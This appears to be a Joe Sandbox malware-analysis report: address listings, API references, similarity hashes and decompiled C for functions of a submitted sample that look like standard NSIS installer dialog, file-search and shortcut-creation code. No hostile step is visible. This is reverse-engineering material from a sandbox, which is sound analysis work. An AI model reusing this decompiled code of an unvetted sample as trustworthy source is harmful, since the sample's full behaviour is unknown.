0x00404b2d
0x00404b2d
0x00404b3b
0x00404b42
0x00404b49
0x00404b4c
0x00404b88
0x00404b8a
0x00404b90
0x00404b95
0x00404b99
0x00404b9b
0x00404b9b
0x00404bb7
0x00000000
0x00404bb9
0x00404bbc
0x00404bca
0x00404bd0
0x00404bd1
0x00404bd4
0x00404bd7
0x00000000
0x00404bd7
0x00404b4e
0x00404b50
0x00404b54
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b56
0x00404b56
0x00404b63
0x00404b68
0x00000000
0x00000000
0x00404b6c
0x00404b6e
0x00404b6e
0x00404b77
0x00404b79
0x00404b7e
0x00404b81
0x00404b86
0x00000000
0x00000000
0x00000000
0x00000000
0x00404b86
0x00404be3
0x00404bed
0x00404bf0
0x00404bf3
0x00404bfa
0x00404bfa
0x00404bfc
0x00404bfc
0x00404c01
0x00404c03
0x00404c0b
0x00404c12
0x00404c14
0x00404c1f
0x00404c1f
0x00404c14
0x00404c2f
0x00404c39
0x00404c41
0x00404c5c
0x00404c43
0x00404c4c
0x00404c4c
0x00404c41
0x00404c61
0x00404c66
0x00404c6b
0x00404c74
0x00404c74
0x00404c7d
0x00404c7f
0x00404c7f
0x00404c8b
0x00404c93
0x00404c9d
0x00404c9d
0x00404ca2
0x00000000
0x00404ca2
0x00404b4c
0x00404b03
0x00404b0a
0x00000000
0x00000000
0x00000000
0x00404b0a
0x00404a29
0x00404a32
0x00404a4c
0x00404a51
0x00404a5b
0x00404a62
0x00404a6e
0x00404a71
0x00404a74
0x00404a7b
0x00404a83
0x00404a86
0x00404a8a
0x00404a91
0x00404a99
0x00404af3
0x00404a9b
0x00404a9c
0x00404aa3
0x00404aad
0x00404ab5
0x00404ac2
0x00404ad6
0x00404ada
0x00404ada
0x00404ad6
0x00404adf
0x00404aec
0x00404aec
0x00404a99
0x00000000
0x00404a51
0x00404a3f
0x00000000
0x00000000
0x00404a45
0x00000000
0x004049b0
0x004049bd
0x004049c6
0x004049d3
0x004049d3
0x004049da
0x004049e0
0x004049e9
0x004049ec
0x004049ef
0x004049f7
0x004049fa
0x004049fd
0x00404a03
0x00404a0a
0x00404a11
0x00404ca8
0x00404cba
0x00404a17
0x00404a1a
0x00000000
0x00404a1a
0x00404a11

APIs

GetDlgItem.USER32 ref: 004049B6
SetWindowTextW.USER32(00000000,?), ref: 004049E0
SHBrowseForFolderW.SHELL32(?), ref: 00404A91
CoTaskMemFree.OLE32(00000000), ref: 00404A9C
lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 00404ACE
lstrcatW.KERNEL32(?,Call), ref: 00404ADA
SetDlgItemTextW.USER32 ref: 00404AEC

Part of subcall function 00405B5E: GetDlgItemTextW.USER32 ref: 00405B71

Part of subcall function 004067A1: CharNextW.USER32(?,*?|<>/":,00000000,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406804
Part of subcall function 004067A1: CharNextW.USER32(?,?,?,00000000,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406813
Part of subcall function 004067A1: CharNextW.USER32(?,00000000,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 00406818
Part of subcall function 004067A1: CharPrevW.USER32(?,?,76F1FAA0,C:\Users\user\AppData\Local\Temp\,?,004034E5,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037ED), ref: 0040682B

GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,00000001,0079FF18,?,?,000003FB,?), ref: 00404BAF
MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BCA

Part of subcall function 00404D23: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DC4
Part of subcall function 00404D23: wsprintfW.USER32 ref: 00404DCD
Part of subcall function 00404D23: SetDlgItemTextW.USER32 ref: 00404DE0

Strings

Call, xrefs: 00404AC8, 00404ACD, 00404AD8
A, xrefs: 00404A8A
C:\Users\user\AppData\Local\Temp, xrefs: 00404AB7

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
String ID: A$C:\Users\user\AppData\Local\Temp$Call
API String ID: 2624150263-1655598669
Opcode ID: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
Instruction ID: 86dd0b9b094f85dab2cef093751cf510b28304c980c81074e8bd76ad65710a38
Opcode Fuzzy Hash: 18688f4ff942e0cd0688df8116ebccbb4873b9e7479cc5ca6d046e93a4f243ee
Instruction Fuzzy Hash: 4DA190B1901208ABDB11EFA5CD45AEF77B8EF84314F11803BF601B62D1DB7C9A418B69

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E60( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4084e4, _t83, 1, 0x4084d4, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x4084f4, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x7b4000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: 170ec6e86a9220940142559721d639d0d56cd3ceb1b5832377203a0a19f0ade3
Instruction ID: 703d758d197f09623ff28e3c758b152e072eb06d6e5445e6f92684eec68365f7
Opcode Fuzzy Hash: 170ec6e86a9220940142559721d639d0d56cd3ceb1b5832377203a0a19f0ade3
Instruction Fuzzy Hash: 47412571A00209EFCF40DFE4C989E9D7BB5BF49344B2045AAF505EB2D1DB799981CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30
fileCOMMON

Download Yara Rule

C-Code - Quality: 39%

			E0040290B(short __ebx, short* __edi) {
				void* _t21;

				if(FindFirstFileW(E00402DA6(2), _t21 - 0x2dc) != 0xffffffff) {
					E00406461( *((intOrPtr*)(_t21 - 0xc)), _t8);
					_push(_t21 - 0x2b0);
					_push(__edi);
					E0040651A();
				} else {
					 *((short*)( *((intOrPtr*)(_t21 - 0xc)))) = __ebx;
					 *__edi = __ebx;
					 *((intOrPtr*)(_t21 - 4)) = 1;
				}
				 *0x7a8ae8 =  *0x7a8ae8 +  *((intOrPtr*)(_t21 - 4));
				return 0;
			}

0x00402923
0x0040293e
0x00402949
0x0040294a
0x00402a94
0x00402925
0x00402928
0x0040292b
0x0040292e
0x0040292e
0x00402c2d
0x00402c39

APIs

FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A

Memory Dump Source

Source File: 00000001.00000002.885897193.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.885892219.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885904269.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.885909054.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886091471.000000000077C000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886099918.0000000000782000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886106311.0000000000786000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886112266.0000000000788000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886136070.00000000007A4000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886142041.00000000007A6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886147369.00000000007A9000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886152715.00000000007AD000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886158026.00000000007B3000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886162273.00000000007B5000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.886169924.00000000007D6000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_aSsc9zh1ex.jbxd

Similarity

API ID: FileFindFirst
String ID:
API String ID: 1974802433-0
Opcode ID: 916bc7ecc775c30468185263b2e38d8e788801032425324021ee9d0e1a06674e
Instruction ID: 12288428410ef0014967daf25a5ca188ca533e908051b72e28feae2455f0dfde
Opcode Fuzzy Hash: 916bc7ecc775c30468185263b2e38d8e788801032425324021ee9d0e1a06674e
Instruction Fuzzy Hash: A6F05E71904114EED701DBA4D949AAEB378EF55318F20857BE101F21D0EBB88E119B2A

Uniqueness

Uniqueness Score: -1.00%

Function 00404EE3 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489
windowmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E00404EE3(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x7a8a88;
				_v28 =  *0x7a8a70 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x7a8a79 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404E31(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x7a8a78) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x7a1f2c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x7a1f40;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x7a1f2c = 0;
								 *0x7a1f40 = 0;
								 *0x7a8ac0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x7a8a79 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404EB1();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x7a1f40;
									_t201 =  *0x7a8a88;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x7a8a8c <= 0) {
										L86:
										if( *0x7a8b1e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x7a7a3c + 0x10)) != 0) {
											E00404DEC(0x3ff, 0xfffffffb, E00404E04(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x7a8a8c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x7a1f40);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x7a8ac0 = _t291;
					 *0x7a1f40 = GlobalAlloc(0x40,  *0x7a8a8c << 2);
					_t258 = LoadImageW( *0x7a8a60, 0x6e, 0, 0, 0, 0);
					 *0x7a1f34 =  *0x7a1f34 | 0xffffffff;
					_t297 = _t258;
					 *0x7a1f3c = SetWindowLongW(_v8, 0xfffffffc, E004054F0);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x7a1f2c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x7a1f2c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E00406557(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E00404476(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E00404476(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x7a8a8c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x7a1f40 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x7a1f40 + _t300 * 4) = _t284;
									_v16 =  *( *0x7a1f40 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x7a8a8c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004044AB(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004044AB(_v12);
								L93:
								return E004044DD(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

0x00404eea
0x00404f03
0x00404f08
0x00404f10
0x00404f16
0x00404f2c
0x00404f2f
0x0040515a
0x00405161
0x00405175
0x00405163
0x00405165
0x00405168
0x00405169
0x00405170
0x00405170
0x00405181
0x0040518f
0x00405192
0x004051a8
0x0040521d
0x00405220
0x00405222
0x0040522c
0x0040523a
0x0040523a
0x0040523c
0x00405246
0x0040524c
0x0040524f
0x00405252
0x0040526d
0x00405254
0x0040525e
0x0040525e
0x00405252
0x00405246
0x00000000
0x00405220
0x004051ad
0x004051b8
0x004051bd
0x004051c4
0x004051c9
0x004051cd
0x004051d8
0x004051d8
0x004051dc
0x004051e0
0x004051e4
0x004051f7
0x004051e6
0x004051e6
0x004051ed
0x004051f3
0x004051ef
0x004051ef
0x004051ef
0x004051ed
0x004051fb
0x004051fd
0x00405210
0x00405213
0x00405216
0x00405216
0x004051e0
0x00000000
0x004051cd
0x004051af
0x004051b6
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00405270
0x00405270
0x00405277
0x004052e8
0x004052f0
0x004052f8
0x004052f8
0x00405301
0x00405303
0x0040530a
0x0040530d
0x0040530d
0x00405313
0x0040531a
0x0040531d
0x0040531d
0x00405323
0x00405329
0x0040532f
0x0040532f
0x0040533c
0x0040549d
0x004054a4
0x004054c1
0x004054c7
0x004054d9
0x004054d9
0x00000000
0x00405342
0x00405344
0x00405349
0x0040534e
0x00405353
0x00405355
0x00405355
0x00405356
0x00405357
0x00405359
0x00405359
0x00405361
0x004053a2
0x004053a4
0x004053b4
0x004053b7
0x004053bc
0x004053c3
0x004053c6
0x00405468
0x00405471
0x00405479
0x00405479
0x00405487
0x00405498
0x00405498
0x00000000
0x00405487
0x004053cc
0x004053cf
0x004053d5
0x004053da
0x004053dc
0x004053de
0x004053e4
0x004053eb
0x004053f0
0x004053f7
0x004053fa
0x004053fa
0x00405401
0x0040540d
0x00405411
0x00405413
0x00405413
0x00405403
0x00405405
0x00405405
0x00405433
0x0040543f
0x0040544e
0x0040544e
0x00405450
0x00405453
0x0040545c
0x00000000
0x00405363
0x0040536e
0x00405371
0x00405376
0x00405378
0x0040537c
0x0040538c
0x00405396
0x00405398
0x0040539b
0x00000000
0x00000000
0x00000000
0x00000000
0x0040537e
0x0040537e
0x00405384
0x00405386
0x00405386
0x00405387
0x00405388
0x00000000
0x0040537e
0x00405361
0x0040533c
0x0040527f
0x00000000
0x00405295
0x0040529f
0x004052a4
0x00000000
0x00000000
0x004052b6
0x004052bb
0x004052c7
0x004052c7
0x004052c9
0x004052d8
0x004052da
0x004052de
0x004052e1
0x00000000
0x004052e1
0x0040527f
0x00404f35
0x00404f3a
0x00404f43
0x00404f4a
0x00404f5c
0x00404f67
0x00404f6d
0x00404f7b
0x00404f8f
0x00404f94
0x00404fa1
0x00404fa6
0x00404fbc
0x00404fcd
0x00404fda
0x00404fda
0x00404fdd
0x00404fe3
0x00404fe5
0x00404fe8
0x00404fed
0x00404ff2
0x00404ff4
0x00404ff4
0x00405014
0x00405014
0x00405016
0x00405017
0x0040501c
0x00405022
0x00405026
0x0040502b
0x00405033
0x00405037
0x0040503c
0x00405041
0x00405049
